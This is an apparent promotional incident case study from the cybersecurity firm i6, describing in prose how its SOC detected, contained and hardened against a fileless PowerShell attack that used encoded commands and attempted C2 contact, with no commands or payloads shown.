During routine monitoring, the i6 Security Operations Center (SOC) detected suspicious PowerShell activity on an employee workstation. The commands being executed were highly unusual and did not match normal application behavior.
Initial analysis suggested that the commands were part of a fileless malware attack, a technique that allows attackers to run malicious code directly in system memory without installing traditional malware files.
Because fileless attacks are designed to evade traditional antivirus detection, rapid investigation by the i6 SOC team was critical to stopping the threat before persistence could be established.
The alert was triggered when the i6 monitoring platform detected encoded PowerShell commands being executed on the system.
These commands were attempting to launch hidden PowerShell sessions, execute encoded scripts, and connect to an external command server.
Such behavior is commonly associated with fileless malware and post-exploitation frameworks used by attackers.
Once the alert was triggered, the i6 SOC analysts began a detailed investigation to understand the attacker’s objective.
The first step involved analyzing the executed PowerShell commands. The investigation revealed that the attacker attempted to run Base64 encoded commands, which are commonly used to hide malicious scripts from security tools.
Endpoint telemetry showed that the PowerShell process was launched by a suspicious parent process that had no legitimate reason to run scripting commands. This strongly indicated that the activity was triggered by a malicious script rather than a legitimate user action.
Further analysis revealed that the PowerShell script attempted to establish communication with an external server. The server was likely intended to act as a command-and-control (C2) system, allowing the attacker to remotely control the compromised machine.
To ensure the attack had not spread, the i6 team conducted threat hunting across the environment. Security analysts searched for similar PowerShell commands and indicators of compromise across other systems. No additional compromised systems were discovered.
After confirming the suspicious PowerShell activity, the i6 SOC team immediately initiated containment procedures to prevent the attacker from maintaining access.
The containment actions included terminating the malicious PowerShell processes running in memory, isolating the affected workstation from the corporate network, blocking outbound communication to the identified command-and-control infrastructure, and disabling the compromised user account associated with the activity.
Because the malware was operating in memory, stopping the active processes and isolating the system prevented the attacker from establishing persistence.
The workstation was then placed under forensic review to confirm that no additional malicious scripts remained active.
After the incident was contained, i6 implemented additional detection measures to prevent similar attacks in the future.
These improvements included implementing stricter monitoring for suspicious PowerShell and command-line activity, enabling advanced detection rules for encoded or obfuscated PowerShell commands, restricting PowerShell execution policies to limit unauthorized script execution, enhancing endpoint monitoring to detect fileless malware behavior in memory, and improving logging and alerting for abnormal scripting activity across systems.
These improvements significantly strengthened the organization’s ability to detect fileless attacks that attempt to abuse legitimate system tool.
Fileless malware attacks represent a growing threat because they rely on legitimate system tools like PowerShell to execute malicious code.
In this incident, i6’s proactive monitoring and rapid investigation enabled the SOC team to detect and stop the attack before it could establish persistence or spread within the network.
The case demonstrates the importance of advanced behavioral monitoring and expert threat analysis in defending against modern cyber threats.
i6 is a modern cybersecurity company dedicated to protecting businesses from digital threats. With expert solutions, 24/7 monitoring, and proven strategies, we secure your future in a connected world.
